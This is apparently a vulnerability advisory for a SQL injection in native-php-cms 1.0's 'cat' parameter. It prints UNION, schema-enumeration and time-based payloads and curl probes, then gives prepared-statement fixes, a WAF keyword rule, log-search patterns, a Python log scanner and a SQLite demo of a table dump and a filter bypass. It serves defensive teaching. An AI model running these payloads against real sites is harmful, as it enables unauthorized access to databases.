The CVE-2025-0488 vulnerability in Fanli2012 native-php-cms 1.0 allows remote attackers to execute arbitrary SQL queries via the `cat` parameter in product_list.php. The parameter is concatenated into an SQL statement without validation or parameter binding, so a crafted `cat` value injects attacker-controlled SQL and can lead to unauthorized database access, data leakage, or further compromise of the host. The attack is network-reachable and low complexity; note, however, that the published CVSS 4.0 vector records PR:L, meaning a low-privileged account is required, so the flaw should not be described as unauthenticated. The "critical" label reflects the advisory's classification rather than the CVSS score.
DailyCVE Form:
Platform: Fanli2012 native-php-cms
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/05/2025
What Undercode Say:
Exploitation:
The payloads below assume `cat` lands inside a single-quoted string; if it is concatenated as a bare number, drop the leading quote (e.g. cat=1 AND SLEEP(5)-- -). The `-- -` sequence is a MySQL line comment that discards the remainder of the original statement.
1. Payload Example (the UNION only executes once its column count matches the original SELECT; find the count with ORDER BY n, raising n until the error appears, or add columns until the error disappears. The 5 here is illustrative):
http://target.com/product_list.php?cat=1' UNION SELECT 1,2,3,4,5-- -
2. Database Enumeration (table_name must be placed in a column the page actually renders):
?cat=1' UNION SELECT 1,table_name,3,4,5 FROM information_schema.tables-- -
3. Blind SQLi Detection (a consistent delay of about 5 seconds confirms injection even when no error text or data is displayed):
http://target.com/product_list.php?cat=1' AND SLEEP(5)-- -
Protection:
1. Input Sanitization (escaping only helps when the value sits inside a quoted string; for a numeric parameter, cast it instead):
$cat = mysqli_real_escape_string($conn, $_GET['cat']); // string context only
$cat = (int) $_GET['cat']; // numeric context: a non-numeric payload becomes 0
2. Prepared Statements (the actual fix; the value is bound, never concatenated):
$stmt = $conn->prepare("SELECT * FROM products WHERE cat = ?"); $stmt->bind_param("s", $_GET['cat']); $stmt->execute();
3. WAF Rules (nginx; a stopgap only: $args is not URL-decoded and keyword lists are easily bypassed with encoding or case tricks, so this must not replace fixing the query):
location ~ ^/product_list\.php$ { if ($args ~* "union|select|sleep|information_schema") { return 403; } }
Analytics:
- CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L (scores 5.3, Medium; PR:L means a low-privileged account is required)
- Exploitability: Remote, Low Complexity, low privileges required
- Patch Status: No official fix
Detection Commands (error-based detection only works if the application displays database errors; otherwise time the SLEEP payload):
curl -sG --data-urlencode "cat=1'" "http://target.com/product_list.php" | grep -i "sql syntax"
time curl -sG --data-urlencode "cat=1' AND SLEEP(5)-- -" "http://target.com/product_list.php" -o /dev/null
Log Analysis (match case-insensitively and include URL-encoded forms, since browsers and tools send ' as %27 and spaces as %20 or +):
grep -i "product_list.php?cat=" /var/log/apache2/access.log | grep -iE "union|select|sleep|information_schema|--|%27|'"
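As an added example (not from the advisory or the CMS), the same log search done in Python over constructed Apache access-log lines. Unlike the raw grep it parses the request line, URL-decodes the `cat` value (so `%27`, `%20` and `+` are handled) and tallies hits per source IP. The log lines, IP addresses, timestamps and user-agent strings are invented for the demo.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format lines for the demo, not real traffic.
# Lines 2-4 carry URL-encoded payloads that a plain grep for ' or "union" misses.
SAMPLE_LOG = """\
203.0.113.5 - - [05/May/2025:10:01:12 +0000] "GET /product_list.php?cat=12 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2025:10:01:40 +0000] "GET /product_list.php?cat=1%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2025:10:02:03 +0000] "GET /product_list.php?cat=1%27%20UNION%20SELECT%201,2,3,4,5--%20- HTTP/1.1" 200 5010 "-" "sqlmap/1.8"
203.0.113.5 - - [05/May/2025:10:02:09 +0000] "GET /product_list.php?cat=1%27+AND+SLEEP(5)--+- HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
198.51.100.7 - - [05/May/2025:10:03:00 +0000] "GET /product_list.php?cat=3&page=2 HTTP/1.1" 200 4700 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [timestamp] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Tokens worth flagging once the parameter value has been decoded.
SUSPICIOUS = re.compile(
    r"""['"]|--|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|information_schema""",
    re.IGNORECASE,
)


def flag_requests(log_text, path="/product_list.php", param="cat"):
    """Return one record per request whose decoded `param` value looks like SQLi."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != path:
            continue
        # parse_qs already decodes %XX and '+'; decoding once more also catches
        # double-encoded payloads such as %2527.
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            decoded = unquote_plus(raw)
            if SUSPICIOUS.search(decoded):
                hits.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "status": int(m["status"]),
                    "cat": decoded,
                })
    return hits


def offenders(hits):
    """Count flagged requests per source IP, most active first."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    found = flag_requests(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["ip"]} {h["status"]} cat={h["cat"]!r}')
    print("per-IP:", offenders(found))
```

Run against a real file with `flag_requests(open("/var/log/apache2/access.log").read())`; a 500 status next to a decoded quote is the strongest single signal, and the per-IP tally is what you feed to a block list or a ticket.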
Mitigation Script (rejecting quote characters alone does not stop cat=1 OR 1=1 when the value is concatenated unquoted; enforce the expected type instead):
if (!isset($_GET['cat']) || !ctype_digit($_GET['cat'])) { die("Invalid input detected"); }
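To make the context dependence concrete, here is an added example (not code from native-php-cms or the advisory) that rebuilds both flawed query shapes and the hardened form against an in-memory SQLite database. The schema, table and column names, rows and the `admin_users` table are constructed for the demo; SQLite stands in for MySQL, so `information_schema` and `SLEEP()` are not reproduced, but the column-count error, the UNION dump, the quote-filter bypass and the parameter-bound fix behave the same way.

```python
import sqlite3

# Added example, not code from native-php-cms. The schema, column names, rows
# and the hash value below are constructed for the demo; the real query in
# product_list.php and its column count are unknown.
SCHEMA = """
CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT, price REAL, hidden INTEGER);
INSERT INTO products VALUES (1, 1, 'Widget', 9.99, 0);
INSERT INTO products VALUES (2, 1, 'Gadget', 19.99, 0);
INSERT INTO products VALUES (3, 2, 'Unlisted SKU', 0.0, 1);
CREATE TABLE admin_users (id INTEGER, username TEXT, password_hash TEXT);
INSERT INTO admin_users VALUES (1, 'admin', 'constructed-hash');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_quoted(conn, cat):
    """String context: cat is pasted between single quotes, so a quote breaks out."""
    sql = (f"SELECT id, cat, name, price, hidden FROM products "
           f"WHERE cat = '{cat}' AND hidden = 0")
    return conn.execute(sql).fetchall()


def vulnerable_numeric(conn, cat):
    """Numeric context: cat is pasted unquoted, so no quote character is needed."""
    sql = (f"SELECT id, cat, name, price, hidden FROM products "
           f"WHERE cat = {cat} AND hidden = 0")
    return conn.execute(sql).fetchall()


def quote_filter(cat):
    """The quote-rejecting mitigation: refuse any value containing ' or "."""
    if "'" in cat or '"' in cat:
        raise ValueError("Invalid input detected")
    return cat


def safe_list(conn, cat):
    """Hardened form: validate the type, then bind the value as a parameter."""
    if not cat.isdigit():
        raise ValueError("cat must be a non-negative integer")
    sql = "SELECT id, cat, name, price, hidden FROM products WHERE cat = ? AND hidden = 0"
    return conn.execute(sql, (int(cat),)).fetchall()


def union_probe(conn, cat):
    """Return the rows, or the database error text if the payload is malformed."""
    try:
        return vulnerable_quoted(conn, cat)
    except sqlite3.OperationalError as exc:
        return str(exc)


def demo():
    conn = make_db()
    out = {}
    out["normal"] = vulnerable_quoted(conn, "1")
    # Wrong column count: the UNION is rejected, which is why an attacker first
    # walks ORDER BY n (or adds columns) until the error goes away.
    out["union_bad_count"] = union_probe(conn, "1' UNION SELECT 1,2,3-- -")
    # Matching column count (5 in this schema): the probe payload runs and adds a row.
    out["union_probe"] = union_probe(conn, "1' UNION SELECT 1,2,3,4,5-- -")
    # Enumeration step: pull another table through the matching columns.
    out["union_dump"] = union_probe(
        conn, "1' UNION SELECT id, 0, username, 0, password_hash FROM admin_users-- -")
    # The quote filter stops the string-context payload...
    try:
        quote_filter("1' UNION SELECT 1,2,3,4,5-- -")
        out["filter_blocks_quoted"] = False
    except ValueError:
        out["filter_blocks_quoted"] = True
    # ...but a numeric-context payload contains no quote and walks straight through,
    # returning the hidden row as well.
    numeric_payload = quote_filter("1 OR 1=1-- -")
    out["numeric_bypass"] = vulnerable_numeric(conn, numeric_payload)
    # The validated, parameter-bound version refuses the payload and serves the real request.
    try:
        safe_list(conn, numeric_payload)
        out["safe_rejects"] = False
    except ValueError:
        out["safe_rejects"] = True
    out["safe_normal"] = safe_list(conn, "1")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The lesson is the one the quote filter misses: which characters are dangerous depends on where the value lands in the statement, so validate the type you expect and bind the value rather than trying to strip what you think the attacker needs.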
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode